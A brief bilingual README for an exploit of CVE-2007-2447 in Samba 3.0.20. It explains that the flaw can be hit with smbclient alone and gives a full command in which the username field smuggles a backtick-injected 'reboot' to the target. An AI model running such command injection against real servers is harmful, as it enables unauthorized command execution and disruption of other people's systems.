
A simple exploit for CVE-2007-2447
Um exploit simples para o CVE-2007-2447, presente no Samba 3.0.20.
Você pode explorar essa vulnerabilidade com ainda menos que isso, por exemplo, com smbclient, mas acho que é difícil executar comandos complexos, já que muitos caracteres especiais provavelmente são perdidos, mas um comando simples (reboot neste caso) pode ser passado assim:
smbclient -L <target IP> --user="/=\`reboot\`" -N